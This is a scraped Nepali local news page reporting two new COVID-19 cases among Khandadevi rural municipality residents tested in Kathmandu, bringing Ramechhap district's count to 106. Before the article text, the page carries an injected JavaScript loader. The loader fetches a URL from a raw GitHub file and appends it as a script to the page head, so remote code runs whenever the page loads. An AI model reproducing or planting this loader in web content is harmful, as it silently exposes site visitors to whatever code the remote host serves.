;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काठमाडौमा बस्ने २ जना खाँडादेवीका स्थानीयमा कोरोना पुष्टि – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • काठमाडौमा बस्ने २ जना खाँडादेवीका स्थानीयमा कोरोना पुष्टि
रामेछाप बिशेष

काठमाडौमा बस्ने २ जना खाँडादेवीका स्थानीयमा कोरोना पुष्टि

भदौ २५,
रामेछाप । रामेछापमा थप (आज) बिहिबार २ जनामा कोरोना पुष्टि भएको छ ।

बिहिवारको नियमित् मिडिया ब्रिफिङ्गा मन्त्रालय प्रवक्त डा. जागेश्वर गौतमले थप दुई जना संक्रमित थपिएको बताए ।

खाँडादेवी गाउँपालिकाको दुई जना रहेका छन । खाँडादेवी तीनको २६ वर्षीय र ३८ वर्षीय पुरुषहरु संक्रमति भएका हुन् । उनीहरुको स्वाब काठमाडौंमै परीक्षण गरिएको जिल्ला अस्पताल रामेछापका स्वास्थ्य अधिकृत भुवन अधिकृतले जानकारी दिए ।

योसंगै जिल्लामा संक्रमितको संख्या १०६ पुगकोे छ।

फेसबुक प्रतिक्रियाहरु